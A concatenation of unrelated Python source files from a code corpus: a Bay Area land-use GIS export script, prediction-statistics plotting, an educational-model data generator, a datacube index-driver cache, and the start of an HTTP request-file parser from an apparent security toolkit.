logger.debug("zone_piv_df.dtypes:\n{}".format(zone_piv_df.dtypes))
logger.debug("zone_piv_df.sum():\n{}".format(zone_piv_df.sum()))
# pivot on buildings/pipeline including ALL building types
zone_piv_agg_df = zone_df.pivot_table(index ="zone_id",
columns=["source","year_built_category_agg","building_type"],
values =["residential_units", "building_sqft", "residential_sqft", "non_residential_sqft"],
aggfunc=numpy.sum)
logger.info("zone_piv_agg_df.head():\n{}".format(zone_piv_agg_df.head()))
zone_piv_agg_df.reset_index(inplace=True)
logger.debug("zone_piv_agg_df for zone_id=1: \n{}".format(zone_piv_agg_df.loc[zone_piv_agg_df.zone_id==1].squeeze()))
# convert column names from tuples
new_cols = []
for col in zone_piv_agg_df.columns.values:
if col[1] == '': # ('zone_id', '', '', '')
new_cols.append(col[0])
else: # ('building_sqft', 'buildings', '0000-2000', 'HM')
new_cols.append(col[1]+" "+col[2]+" "+col[3]+" "+col[0])
zone_piv_agg_df.columns = new_cols
logger.debug("zone_piv_agg_df.head():\n{}".format(zone_piv_agg_df.head()))
logger.debug("zone_piv_agg_df.dtypes:\n{}".format(zone_piv_agg_df.dtypes))
logger.debug("zone_piv_agg_df.sum():\n{}".format(zone_piv_agg_df.sum()))
# merge zone_piv_df and zone_piv_agg_df
zone_piv_df = pandas.merge(left=zone_piv_df, right=zone_piv_agg_df, left_on="zone_id", right_on="zone_id", how="outer")
# will create 4 datasets
KEEP_COLUMNS_BY_DATASET = {
"base_res": ["zone_id","source",
"buildings 0000-2000 DM residential_units",
"buildings 0000-2000 HS residential_units",
"buildings 0000-2000 HT residential_units",
"buildings 0000-2000 HM residential_units",
"buildings 0000-2000 MR residential_units",
"buildings 0000-2000 all residential_units",
"buildings 2001-2010 DM residential_units",
"buildings 2001-2010 HS residential_units",
"buildings 2001-2010 HT residential_units",
"buildings 2001-2010 HM residential_units",
"buildings 2001-2010 MR residential_units",
"buildings 2001-2010 all residential_units",
"buildings 2011-2015 DM residential_units",
"buildings 2011-2015 HS residential_units",
"buildings 2011-2015 HT residential_units",
"buildings 2011-2015 HM residential_units",
"buildings 2011-2015 MR residential_units",
"buildings 2011-2015 all residential_units",
"buildings 0000-2015 DM residential_units",
"buildings 0000-2015 HS residential_units",
"buildings 0000-2015 HT residential_units",
"buildings 0000-2015 HM residential_units",
"buildings 0000-2015 MR residential_units",
# 2015 HU count
"buildings 0000-2015 all residential_units",
],
"base_nonres": ["zone_id","source",
"buildings 0000-2000 all non_residential_sqft",
"buildings 2001-2010 all non_residential_sqft",
"buildings 2011-2015 all non_residential_sqft",
# 2015 Commercial Square Feet
"buildings 0000-2015 AL non_residential_sqft",
"buildings 0000-2015 CM non_residential_sqft",
"buildings 0000-2015 DM non_residential_sqft",
"buildings 0000-2015 FP non_residential_sqft",
"buildings 0000-2015 GV non_residential_sqft",
"buildings 0000-2015 HM non_residential_sqft",
"buildings 0000-2015 HO non_residential_sqft",
"buildings 0000-2015 HP non_residential_sqft",
"buildings 0000-2015 HS non_residential_sqft",
"buildings 0000-2015 HT non_residential_sqft",
"buildings 0000-2015 IH non_residential_sqft",
"buildings 0000-2015 IL non_residential_sqft",
"buildings 0000-2015 IN non_residential_sqft",
"buildings 0000-2015 IW non_residential_sqft",
"buildings 0000-2015 LR non_residential_sqft",
"buildings 0000-2015 ME non_residential_sqft",
"buildings 0000-2015 MH non_residential_sqft",
"buildings 0000-2015 MR non_residential_sqft",
"buildings 0000-2015 MT non_residential_sqft",
"buildings 0000-2015 OF non_residential_sqft",
"buildings 0000-2015 OT non_residential_sqft",
"buildings 0000-2015 PA non_residential_sqft",
"buildings 0000-2015 PG non_residential_sqft",
"buildings 0000-2015 RB non_residential_sqft",
"buildings 0000-2015 RF non_residential_sqft",
"buildings 0000-2015 RS non_residential_sqft",
"buildings 0000-2015 SC non_residential_sqft",
"buildings 0000-2015 SR non_residential_sqft",
"buildings 0000-2015 UN non_residential_sqft",
"buildings 0000-2015 VA non_residential_sqft",
"buildings 0000-2015 VP non_residential_sqft",
"buildings 0000-2015 all non_residential_sqft",
"buildings 0000-2000 all building_sqft",
"buildings 2001-2010 all building_sqft",
"buildings 2011-2015 all building_sqft",
"buildings 0000-2015 all building_sqft",
],
"pipe_res": ["zone_id","source",
# residential units built from 2016 on
"pipeline 2016-2020 AL residential_units",
"pipeline 2016-2020 DM residential_units",
"pipeline 2016-2020 HS residential_units",
"pipeline 2016-2020 HT residential_units",
"pipeline 2016-2020 HM residential_units",
"pipeline 2016-2020 ME residential_units",
"pipeline 2016-2020 MR residential_units",
"pipeline 2016-2020 all residential_units",
"pipeline 2021-2030 AL residential_units",
"pipeline 2021-2030 DM residential_units",
"pipeline 2021-2030 HS residential_units",
"pipeline 2021-2030 HT residential_units",
"pipeline 2021-2030 HM residential_units",
"pipeline 2021-2030 ME residential_units",
"pipeline 2021-2030 MR residential_units",
"pipeline 2021-2030 all residential_units",
"pipeline 2031-2050 AL residential_units",
"pipeline 2031-2050 DM residential_units",
"pipeline 2031-2050 HS residential_units",
"pipeline 2031-2050 HT residential_units",
"pipeline 2031-2050 HM residential_units",
"pipeline 2031-2050 ME residential_units",
"pipeline 2031-2050 MR residential_units",
"pipeline 2031-2050 all residential_units",
"pipeline 2016-2050 AL residential_units",
"pipeline 2016-2050 DM residential_units",
"pipeline 2016-2050 HS residential_units",
"pipeline 2016-2050 HT residential_units",
"pipeline 2016-2050 HM residential_units",
"pipeline 2016-2050 ME residential_units",
"pipeline 2016-2050 MR residential_units",
"pipeline 2016-2050 all residential_units",
],
"pipe_nonres": ["zone_id","source",
# commercial Square Feet Built From 2016
"pipeline 2016-2020 all non_residential_sqft",
"pipeline 2021-2030 all non_residential_sqft",
"pipeline 2031-2050 all non_residential_sqft",
"pipeline 2016-2050 AL non_residential_sqft",
"pipeline 2016-2050 CM non_residential_sqft",
"pipeline 2016-2050 DM non_residential_sqft",
"pipeline 2016-2050 FP non_residential_sqft",
"pipeline 2016-2050 GV non_residential_sqft",
"pipeline 2016-2050 HM non_residential_sqft",
"pipeline 2016-2050 HO non_residential_sqft",
"pipeline 2016-2050 HP non_residential_sqft",
"pipeline 2016-2050 HS non_residential_sqft",
"pipeline 2016-2050 HT non_residential_sqft",
"pipeline 2016-2050 IH non_residential_sqft",
"pipeline 2016-2050 IL non_residential_sqft",
"pipeline 2016-2050 IN non_residential_sqft",
"pipeline 2016-2050 IW non_residential_sqft",
"pipeline 2016-2050 LR non_residential_sqft",
"pipeline 2016-2050 ME non_residential_sqft",
"pipeline 2016-2050 MH non_residential_sqft",
"pipeline 2016-2050 MR non_residential_sqft",
"pipeline 2016-2050 MT non_residential_sqft",
"pipeline 2016-2050 OF non_residential_sqft",
"pipeline 2016-2050 OT non_residential_sqft",
"pipeline 2016-2050 PA non_residential_sqft",
"pipeline 2016-2050 PG non_residential_sqft",
"pipeline 2016-2050 RB non_residential_sqft",
"pipeline 2016-2050 RF non_residential_sqft",
"pipeline 2016-2050 RS non_residential_sqft",
"pipeline 2016-2050 SC non_residential_sqft",
"pipeline 2016-2050 SR non_residential_sqft",
"pipeline 2016-2050 UN non_residential_sqft",
"pipeline 2016-2050 VA non_residential_sqft",
"pipeline 2016-2050 VP non_residential_sqft",
"pipeline 2016-2050 all non_residential_sqft",
]
}
zone_datasets = {}
for dataset in KEEP_COLUMNS_BY_DATASET.keys():
logger.info("Creating dataset for {}".format(dataset))
keep_columns = KEEP_COLUMNS_BY_DATASET[dataset].copy()
# but only if they exist
keep_columns_present = []
for col in keep_columns:
if col in list(zone_piv_df.columns.values): keep_columns_present.append(col)
zone_dataset_piv_df = zone_piv_df[keep_columns_present]
# fill na with zero
zone_dataset_piv_df.fillna(value=0, inplace=True)
logger.info("zone_dataset_piv_df.dtypes:\n{}".format(zone_dataset_piv_df.dtypes))
# add parcel acres
zone_dataset_piv_df = pandas.merge(left=zone_dataset_piv_df, right=parcels_zone_df, how="outer")
# and employment, if relevant
if dataset == "base_nonres":
zone_dataset_piv_df = pandas.merge(left=zone_dataset_piv_df, right=tm_lu_df, how="outer")
# and 2015 Employee Density
zone_dataset_piv_df["Employee Density 2015"] = zone_dataset_piv_df["TOTEMP"]/zone_dataset_piv_df["parcel_acres"]
zone_dataset_piv_df.loc[ zone_dataset_piv_df["parcel_acres"] == 0, "Employee Density 2015" ] = 0.0
# 2015 Commercial Square Feet per Employee
zone_dataset_piv_df["Commercial Square Feet per Employee 2015"] = \
zone_dataset_piv_df["buildings 0000-2015 all non_residential_sqft"]/zone_dataset_piv_df["TOTEMP"]
zone_dataset_piv_df.loc[ zone_dataset_piv_df["TOTEMP"] == 0, "Commercial Square Feet per Employee 2015"] = 0.0
# and 2015 HU Density, if relevant
if dataset == "base_res":
zone_dataset_piv_df["HU Density 2015"] = zone_dataset_piv_df["buildings 0000-2015 all residential_units"]/zone_dataset_piv_df["parcel_acres"]
zone_dataset_piv_df.loc[ zone_dataset_piv_df["parcel_acres"] == 0, "HU Density 2015" ] = 0.0
# zone pivot: add county/superdistrict
zone_dataset_piv_df = pandas.merge(left=zone_dataset_piv_df, right=taz_sd_county_df, how="outer")
logger.info("zone_dataset_piv_df.head():\n{}".format(zone_dataset_piv_df.head()))
# write zone_dataset_piv_df
zone_dataset_piv_file = os.path.join(OUTPUT_DIR, "{}.csv".format(dataset))
zone_dataset_piv_df.to_csv(zone_dataset_piv_file, index=False)
logger.info("Wrote {}".format(zone_dataset_piv_file))
# keep it for arcpy
zone_datasets[dataset] = zone_dataset_piv_df
# for tableau, let's not pivot, and let's not keep the all btypes
zone_df = pandas.concat([buildings_zone_btype_df, pipeline_zone_btype_df], axis="index")
# zone: add county/superdistrict
zone_df = pandas.merge(left=zone_df, right=taz_sd_county_df, how="outer")
logger.info("zone_df.head():\n{}".format(zone_df.head()))
# write zone_df
zone_file = os.path.join(OUTPUT_DIR, "urbansim_input_zonedata.csv")
zone_df.to_csv(zone_file, index=False)
logger.info("Wrote {}".format(zone_file))
logger.info("importing arcpy....")
import arcpy
arcpy.env.workspace = WORKSPACE_GDB
# create metadata
new_metadata = arcpy.metadata.Metadata()
new_metadata.title = "UrbanSim input"
new_metadata.summary = "Data derived from UrbanSim Basemap and Development Pipeline for review"
new_metadata.description = \
"Basemap source: {}\n".format(URBANSIM_BASEMAP_FILE) + \
"Pipeline source: {}\n".format(URBANSIM_PIPELINE_FILE) + \
"Employment source: {}\n".format(EMPLOYMENT_FILE)
logger.info("Metadata description: {}".format(new_metadata.description))
new_metadata.credits = "create_tazdata_devpipeline_map.py"
field_re = re.compile("(pipeline|buildings)_(\S\S\S\S_\S\S\S\S)_([a-zA-Z]+)_(\S+)$")
for dataset in zone_datasets.keys():
logger.info("Processing datasset {}".format(dataset))
# bring in binary of dataset since arcpy mangles csv datatypes
dataset_table = "{}".format(dataset)
try: arcpy.Delete_management(dataset_table)
except: pass
logger.info("Converting dataset to arcpy table {}".format(dataset_table))
zone_piv_nparr = numpy.array(numpy.rec.fromrecords(zone_datasets[dataset].values))
zone_piv_nparr.dtype.names = tuple(zone_datasets[dataset].dtypes.index.tolist())
arcpy.da.NumPyArrayToTable(zone_piv_nparr, os.path.join(WORKSPACE_GDB, dataset_table))
# create join layer with tazdata and zone_file
logger.info("Joining {} with {}".format(TAZ_SHPFILE, dataset_table))
dataset_joined = arcpy.AddJoin_management(TAZ_SHPFILE, "TAZ1454",
os.path.join(WORKSPACE_GDB, dataset_table), "zone_id")
# save it as a feature class -- delete one if it already exists first
dataset_fc = "{}_fc".format(dataset)
try: arcpy.Delete_management(dataset_fc)
except: pass
logger.info("Saving it as {}".format(dataset_fc))
arcpy.CopyFeatures_management(dataset_joined, dataset_fc)
# set aliases
ALIASES = {
# https://github.com/BayAreaMetro/modeling-website/wiki/TazData
"TOTEMP" : "Total employment",
"RETEMPN": "Retail employment",
"FPSEMPN": "Financial and prof employment",
"HEREMPN": "Health edu and rec employment",
"AGREMPN": "Ag and natural res employment",
"MWTEMPN": "Manuf wholesale and transp employment",
"OTHEMPN": "Other employment"
}
fieldList = arcpy.ListFields(dataset_fc)
for field in fieldList:
logger.debug("field: [{}]".format(field.name))
if field.name.startswith("{}_".format(dataset_table)):
postfix = field.name[len(dataset_table)+1:]
logger.debug("postfix: [{}]".format(postfix))
if postfix in ALIASES.keys():
arcpy.AlterField_management(dataset_fc, field.name, new_field_alias=ALIASES[postfix])
else:
match = field_re.match(postfix)
if match:
logger.debug("match: {} {} {} {}".format(match.group(1), match.group(2), match.group(3), match.group(4)))
new_alias = ""
if match.group(4) == "residential_units":
new_alias = "HU "
elif match.group(4) == "non_residential_sqft":
new_alias = "nonres sqft "
elif match.group(4) == "building_sqft":
new_alias = "bldg sqft "
new_alias += match.group(2) + " " # year range
new_alias += BUILDING_TYPE_TO_DESC[match.group(3)] # building type
arcpy.AlterField_management(dataset_fc, field.name, new_field_alias=new_alias)
# set metadata
logger.info("Setting featureclass metadata")
# aprx = arcpy.mp.ArcGISProject(ARCGIS_PROJECT)
# for m in aprx.listMaps():
# logger.debug("Map: {}".format(m.name))
# for lyt in aprx.listLayouts():
# logger.debug("Layout: {}".format(lyt.name))
# aprx.save()
dataset_fc_metadata = arcpy.metadata.Metadata(dataset_fc)
logger.debug("feature class metadata isReadOnly? {}".format(dataset_fc_metadata.isReadOnly))
dataset_fc_metadata.copy(new_metadata)
dataset_fc_metadata.save()
# copy over pipeline with additional info added from building_types_df
building_types_table = "building_types"
try: arcpy.Delete_management(building_types_table)
except: pass
building_types_arr = numpy.array(numpy.rec.fromrecords(building_types_df.values))
building_types_arr.dtype.names = tuple(building_types_df.dtypes.index.tolist())
arcpy.da.NumPyArrayToTable(building_types_arr, os.path.join(WORKSPACE_GDB, building_types_table))
# create join layer with tazdata and zone_file
logger.info("Joining {} with {}".format(os.path.join(URBANSIM_PIPELINE_GDB, "pipeline"), building_types_table))
dataset_joined = arcpy.AddJoin_management(os.path.join(URBANSIM_PIPELINE_GDB, "pipeline"), "building_type",
os.path.join(WORKSPACE_GDB, building_types_table), "building_type_det")
pipeline_fc = "pipeline"
try: arcpy.Delete_management(pipeline_fc)
except: pass
logger.info("Saving it as {}".format(pipeline_fc))
arcpy.CopyFeatures_management(dataset_joined, pipeline_fc)
logger.info("Complete")
"""
=> Save individual layer as web layer
Go to Service URL (ugly webpage that looks like services3.argics.com...)
Click on link View In: ArcGIS.com Map
Add that to the web map and the field aliases will work
Pop-up panel widget for custom web app:
https://community.esri.com/docs/DOC-7355-popup-panel-widget-version-213-102519
Basemap Employment for TAZ {base_nonres_zone_id}
<font size="2">
<table>
<tr><td>Total Employment:</td><td>{base_nonres_TOTEMP}</td></tr>
<tr><td>Retail:</td><td>{base_nonres_RETEMPN}</td></tr>
<tr><td>Financial & prof:</td><td>{base_nonres_FPSEMPN}</td></tr>
<tr><td>Health, educ & rec:</td><td>{base_nonres_HEREMPN}</td></tr>
<tr><td>Ag & natural res.:</td><td>{base_nonres_AGREMPN}</td></tr>
<tr><td>Manuf, wholesale and transp:</td><td>{base_nonres_MWTEMPN}</td></tr>
<tr><td>Other:</td><td>{base_nonres_OTHEMPN}</td></tr><p><span></td></tr>
<tr><td>Parcel acres:</td><td>{base_nonres_parcel_acres}</td></tr>
<tr><td>Employee Density:</td><td>{base_nonres_Employee_Density_2015}</td></tr>
<tr><td>Non-Residential Square Feet:</td><td>{base_nonres_buildings_0000_2015_all_no}</td></tr>
<tr><td>Commercial Square Feet per Employee:</td><td>{base_nonres_Commercial_Square_Feet_per}</td></tr>
</table>
</font>
Charts:
Employment by Industry
Non-Residential Sqft by Year Built
Basemap Housing Units for TAZ {base_res_zone_id}
Charts:
Housing Unit by Building Type
Housing Unit by Year Built
Decode( building_type,
'HS','single family residential'
'HT','townhomes',
'HM','multi family residential',
'MH','mobile home',
'SR','single room occupancy',
'AL','assisted living',
'DM','dorm or shelter',
'CM','condo or apt common area',
'OF','office',
'GV','gov',
'HP','hospital',
'HO','hotel',
'SC','k12 school',
'UN','college or university',
'IL','light industrial',
'FP','food processing and wineries',
'IW','warehouse or logistics',
'IH','heavy industrial',
'RS','retail general',
'RB','retail big box or regional',
'MR','mixed use residential focused',
'MT','mixed use industrial focused',
'ME','mixed use employment focused',
'PA','parking lot',
'PG','parking garage',
'VA','vacant',
'LR','golf course or other low density rec use',
'VP','vacant permanently such as park or transport net',
'OT','other or unknown',
'IN','institutional',
'RF','retail food or drink',
'unknown')
""" | StarcoderdataPython |
9717467 | import numpy as np
from scipy import stats
import matplotlib
matplotlib.use('tkagg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from scipy.stats import kde
def print_stats(labels_test, labels_predict):
''''
Calculate the following statistics from machine learning tests.
RMSE, Bias, linregress results
'''
# labels_predict = regr.predict(features_test)
sqerr_sum_i = 0
sqerr_sum_pl = 0
sqerr_sum_w = 0
b_i = 0
b_pl = 0
b_w = 0
rmse_counter = 0
average_sum = 0
for i in range(len(labels_test)):
b_i += np.subtract(labels_predict[i][0], labels_test[i][0])
b_pl += np.subtract(labels_predict[i][1], labels_test[i][1])
b_w += np.subtract(labels_predict[i][2], labels_test[i][2])
sqerr_sum_i += np.square(np.subtract(labels_predict[i][0], labels_test[i][0]))
sqerr_sum_pl += np.square(np.subtract(labels_predict[i][1], labels_test[i][1]))
sqerr_sum_w += np.square(np.subtract(labels_predict[i][2], labels_test[i][2]))
rmse_counter += 1.
average_sum += np.sum(labels_predict[i,:])
rmse_i = np.sqrt(sqerr_sum_i / rmse_counter)
rmse_pl = np.sqrt(sqerr_sum_pl / rmse_counter)
rmse_w = np.sqrt(sqerr_sum_w / rmse_counter)
bias_i = b_i / len(labels_test)
bias_pl = b_pl / len(labels_test)
bias_w = b_w / len(labels_test)
print("RMSE: I: {0:0.3f} | P: {1:0.3f} | W: {2:0.3f}".format(rmse_i, rmse_pl, rmse_w))
print("Bias: I: {0:0.3f} | P: {1:0.3f} | W: {2:0.3f}".format(bias_i, bias_pl, bias_w))
ice_stats = stats.linregress(labels_test[:, 0],labels_predict[:, 0])
print("ice: Slope: {0:0.3f} | Int: {1:0.3f} | R: {2:0.3f}".format(ice_stats[0],
ice_stats[1],
ice_stats[2]))
pnd_stats = stats.linregress(labels_test[:, 1], labels_predict[:, 1])
print("pnd: Slope: {0:0.3f} | Int: {1:0.3f} | R: {2:0.3f}".format(pnd_stats[0],
pnd_stats[1],
pnd_stats[2]))
ocn_stats = stats.linregress(labels_test[:, 2], labels_predict[:, 2])
print("ocn: Slope: {0:0.3f} | Int: {1:0.3f} | R: {2:0.3f}".format(ocn_stats[0],
ocn_stats[1],
ocn_stats[2]))
print("Average sum: {}".format(average_sum/rmse_counter))
# r_score = regr.score(features_test,labels_test)
# print("Score: {}".format(r_score))
def plot_results(labels_test, labels_predict):
fig, axs = plt.subplots(ncols=3, sharey=True)
ax = axs[0]
ax.hist2d(labels_test[:, 0], labels_predict[:, 0],
bins=90,
norm=colors.LogNorm(),
cmap='PuBu')
ax.axis([0, 1, 0, 1])
ax.set_title("Ice")
ax = axs[1]
ax.hist2d(labels_test[:, 1], labels_predict[:, 1],
bins=90,
norm=colors.LogNorm(),
cmap='PuBu')
ax.axis([0, 1, 0, 1])
ax.set_title("Pond")
ax.set_xlabel("True")
ax = axs[2]
ax.hist2d(labels_test[:, 2], labels_predict[:, 2],
bins=90,
norm=colors.LogNorm(),
cmap='PuBu')
ax.axis([0, 1, 0, 1])
ax.set_title("Ocean")
fig.tight_layout()
plt.show()
# x = labels_test[:, 0]
# y = labels_predict[:, 0]
# nbins = 300
# k = kde.gaussian_kde([x, y])
# xi, yi = np.mgrid[x.min():x.max():nbins * 1j, y.min():y.max():nbins * 1j]
# xi, yi = np.mgrid[0:1:nbins * 1j, 0:1:nbins * 1j]
# zi = k(np.vstack([xi.flatten(), yi.flatten()]))
# plt.pcolormesh(xi, yi, zi.reshape(xi.shape), shading='gouraud', cmap=plt.cm.Reds_r) | StarcoderdataPython |
11319206 | import numpy as np
import pandas as pd
import os, sys
from data.load_data import f
from Representation.dkt import DKT
from Representation.problem2vec import P2V
from Qmatrix.qmatrix import Qmatrix
from AFM.load_data import load_data
from DAFM.load_data import DAFM_data
import pdb
class afm_data_generator():
def __init__(self, args):
self.args = args
self.use_batches = True if self.args.dafm[1] == "Yes" else False
def create_dict(self):
representation_obj = {}
representation_obj['rnn-dense'] = DKT(self.original_data, 'dense','rnn')
representation_obj['rnn-correct'] = DKT(self.original_data, 'correct','rnn')
representation_obj['rnn-incorrect'] = DKT(self.original_data, 'incorrect','rnn')
representation_obj['rnn-correct-incorrect'] = DKT(self.original_data, 'correct-incorrect','rnn')
# representation_obj['lstm-dense'] = DKT(self.original_data, 'dense','lstm')
# representation_obj['lstm-correct'] = DKT(self.original_data, 'correct','lstm')
# representation_obj['lstm-incorrect'] = DKT(self.original_data, 'incorrect','lstm')
# representation_obj['lstm-correct-incorrect'] = DKT(self.original_data, 'correct-incorrect','lstm')
representation_obj['w2v-withCorrectness'] = P2V('withCorrectness')
representation_obj['w2v-withoutCorrectness'] = P2V('withoutCorrectness')
self.representation_obj = representation_obj
def generate_representation(self, input_data):
""" Appending vectors for problem using W2V or RNN """
data_for_repr = input_data
repr_object = self.representation_obj[self.args.representation[0]]
if self.args.representation[0][:3] == "w2v":
param = {'ws':int(self.args.w2v_params[1]) , 'vs':int(self.args.w2v_params[0]), 'mt':1, 'mc':0, 'data_path':data_for_repr}
data_with_representation = repr_object.prob2vec(**param)
else:
param = {'activation':'linear', 'hidden_layer_size':int(self.args.rnn_params[0]), 'data':data_for_repr}
data_with_representation = repr_object.dkt_representation(**param)
return data_with_representation
def generate_Xmatrix(self, input_data):
""" Making Skill Model using problem vectors using clustering requires matlab """
data_for_qmatrix = input_data
if self.args.representation[0] is not None:
qmatrix_obj = Qmatrix(data=data_for_qmatrix, path=self.args.workingDir[0], ctype="kmeans", csize=self.args.clustering_params[0], distance=self.args.clustering_params[1], uid='3')
qmatrix_obj.problemvector()
qmatrix = qmatrix_obj.q_matrix()
X_new_skill = qmatrix_obj.main(self.original_data, qmatrix)
else:
X_new_skill = self.original_data
return X_new_skill
def generate_dkt(self, input_data):
dkt_obj = DKT(input_data, "rnn", "rnn")
input_dim = len(dkt_obj.p)
input_dim_order = len(dkt_obj.up)
training_data = input_data[input_data['user_id'].isin(self.user_train)]
testing_data = input_data[input_data['user_id'].isin(self.user_test)]
trainX, trainY, trainY_order = dkt_obj.dkt_data(training_data)
testX, testY, testY_order = dkt_obj.dkt_data(testing_data)
return [trainX, trainY, trainY_order, testX, testY, testY_order, input_dim, input_dim_order]
def generate_afm(self, input_data):
""" Generating data suitable for AFM model """
data_for_afm = input_data
x1, x2 = load_data(data_for_afm, self.user_train, self.user_test)
trainX, trainY = np.concatenate((x1[0], x1[1]), axis=1), x1[2]
testX, testY = np.concatenate((x2[1], x2[2]), axis=1), x2[3]
d_t = x2[0][0]
return [trainX, trainY, testX, testY, d_t]
def generate_dafm(self, input_data):
data_for_dafm = input_data
dafmdata_obj = DAFM_data(args=self.args, complete_data=data_for_dafm, user_train=self.user_train, user_test=self.user_test, df_user_responses=self.df_user_responses, path=self.args.workingDir[0]+self.args.dataset[0], section=self.args.section[0], use_batches=self.use_batches)
if self.args.skill_wise[0]=="True":
if (not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"skill_index.csv")) or (not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"problem_index.csv")):
d_skill = dafmdata_obj.d_skill
skills = []
index = []
for i,j in d_skill.items():
skills.append(i)
index.append(j)
if not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"):
os.makedirs(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/")
pd.DataFrame({"skills":skills, "index":index}).to_csv(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"skill_index.csv", sep=",", index=False)
d_problem = dafmdata_obj.d_problem
problems = [i for i,j in d_problem.items()]
index = [j for i,j in d_problem.items()]
if not os.path.exists(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"):
os.makedirs(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/")
pd.DataFrame({"problem":problems, "index":index}).to_csv(self.args.workingDir[0]+self.args.dataset[0]+"/SkillWise/"+"problem_index.csv", sep=",", index=False)
if self.use_batches:
return [dafmdata_obj, {'Q_jk_initialize':dafmdata_obj.Q_jk_initialize, 'section_count':dafmdata_obj.section_count, 'student_count': len(dafmdata_obj.d_student)}]
else:
trainX, trainY, trainS, trainStudent, testX, testY, testS, testStudent = dafmdata_obj.data_generator()
return [trainX, trainY, trainS, trainStudent, testX, testY, testS, testStudent, {'Q_jk_initialize':dafmdata_obj.Q_jk_initialize, 'student_count': len(dafmdata_obj.d_student), 'section_count':dafmdata_obj.section_count}]
def main(self):
# original_data, df_user_responses = f(args=self.args, problem_hierarchy=self.args.unit[0], make_unit_users=self.args.unit_users[0])
original_data, df_user_responses = f(args=self.args, make_unit_users=self.args.unit_users[0])
self.df_user_responses = df_user_responses
temp = "" if self.args.puser[0] == "orig" else "sub"
self.user_train = set(pd.read_csv(self.args.workingDir[0]+"datasets/" +self.args.dataset[0]+"/Users/"+temp+"train.csv", header=None)[0].map(str))
self.user_test = set(pd.read_csv(self.args.workingDir[0]+"datasets/"+self.args.dataset[0]+"/Users/"+temp+"test.csv", header=None)[0].map(str))
print ("users:",len(self.user_train), len(self.user_test))
self.original_data = original_data
users = set(original_data["user_id"].map(str))
self.user_train = list(users.intersection(self.user_train))
self.user_test = list(users.intersection(self.user_test))
if (not (self.args.representation[0] == None)):
if "skill_name" not in original_data.columns:
if type(self.args.clustering_params[0]) == int:
self.args.clustering_params[0] = "integer_"+str(self.args.clustering_params[0])
original_data["skill_name"] = ["^"]*len(original_data)
print ("Skill Model Using Word2Vec or DKT....")
self.create_dict()
data_with_repr = self.generate_representation(input_data=original_data)
elif ("skill_name" in original_data.columns):
print ("Skill Model Using ", self.args.skill_name[0], "....")
data_with_repr = original_data
else:
print ("No skill model found")
sys.exit()
X_matrix = self.generate_Xmatrix(input_data=data_with_repr)
if not (self.args.dkt[0]==None):
print ('DKT loading data ....')
yield self.generate_dkt(input_data=X_matrix)
if not (self.args.afm[0]==None):
print ('AFM loading data ....')
yield self.generate_afm(input_data=X_matrix)
if not (self.args.dafm[0]==None):
print ('DAFM loading data ....')
dg = self.generate_dafm(input_data=X_matrix)
yield dg
| StarcoderdataPython |
267290 | <reponame>Zac-HD/datacube-core<gh_stars>1-10
from __future__ import absolute_import
from .driver_cache import load_drivers
class IndexDriverCache(object):
def __init__(self, group):
self._drivers = load_drivers(group)
if len(self._drivers) == 0:
from datacube.index.index import index_driver_init
self._drivers = dict(default=index_driver_init())
for driver in list(self._drivers.values()):
if hasattr(driver, 'aliases'):
for alias in driver.aliases:
self._drivers[alias] = driver
def __call__(self, name):
"""
:returns: None if driver with a given name is not found
:param str name: Driver name
:return: Returns IndexDriver
"""
return self._drivers.get(name, None)
def drivers(self):
""" Returns list of driver names
"""
return list(self._drivers.keys())
def index_cache():
""" Singleton for IndexDriverCache
"""
# pylint: disable=protected-access
if not hasattr(index_cache, '_instance'):
index_cache._instance = IndexDriverCache('datacube.plugins.index')
return index_cache._instance
def index_drivers():
""" Returns list driver names
"""
return index_cache().drivers()
def index_driver_by_name(name):
""" Lookup writer driver by name
:returns: Initialised writer driver instance
:returns: None if driver with this name doesn't exist
"""
return index_cache()(name)
| StarcoderdataPython |
9644930 | <reponame>watchdogoblivion/watchdogs-offsec<gh_stars>0
# author: WatchDogOblivion
# description: TODO
# WatchDogs Request Parser Service
import re
from collections import OrderedDict
from watchdogs.io.parsers import FileArgs
from watchdogs.base.models import AllArgs, Common
from watchdogs.utils.StringUtility import StringUtility
from watchdogs.web.models import WebFile
from watchdogs.web.parsers import RequestArgs
from watchdogs.web.models.Requests import Request
from watchdogs.utils.Constants import (EMPTY, HTTP, LFN, LFR, LR, SPACE, CONTENT_DISPOSITION, CONTENT_TYPE,
FILE_NAME, RB)
class RequestParserService(Common):
BOUNDARY_REGEX = r'boundary=([-a-zA-Z0-9]*)(?:$| )'
KEY_REGEX = r'([-a-zA-Z0-9]+):'
VALUE_REGEX = r':(.*)'
NAME_REGEX = r' name="([^"]*)'
FILENAME_REGEX = r' filename="([^"]*)'
def __init__(self): #type: () -> None
super(RequestParserService, self).__init__()
def setBoundary(self, request, fileLine): #type: (Request, str) -> bool
matchedBoundary = re.search(RequestParserService.BOUNDARY_REGEX, fileLine)
if (matchedBoundary):
request.setRequestBoundary(matchedBoundary.group(1))
return True
return False
def isLineFeed(self, string): #type: (str) -> bool
return string == LFN or string == LFR
def setFields(self, request, fileLines): #type: (Request, str) -> None
fileLinesLength = len(fileLines)
index = 0
rawValue = EMPTY
isBody = False
boundarySet = False
while (index < fileLinesLength):
fileLine = fileLines[index]
isLastIndex = index + 1 == fileLinesLength
if (not boundarySet):
boundarySet = self.setBoundary(request, fileLine)
if (index == 0):
if (HTTP.upper() not in fileLine):
print("Please check file format and ensure that the first line contains the method,"
" endpoint and protocol.")
raise Exception("Illegal file format")
request.setRawInfo(fileLine.strip())
index += 1
continue
elif ((self.isLineFeed(fileLine) and not isBody) or (isLastIndex and not isBody)):
isBody = True
request.setRawHeaders(rawValue)
rawValue = EMPTY
elif (isLastIndex):
rawValue += fileLine + LFN
request.setRawBody(rawValue)
index += 1
rawValue += fileLine + LFN
index += 1
def parseInfo(self, requestArgs, request): #type: (RequestArgs, Request) -> None
rawInfo = request.getRawInfo()
requestInfo = request.getRequestInfo()
rawInfoSplit = rawInfo.rstrip().split(SPACE)
requestInfo.setUrlHost(requestArgs.remoteHost)
requestInfo.setMethod(rawInfoSplit[0])
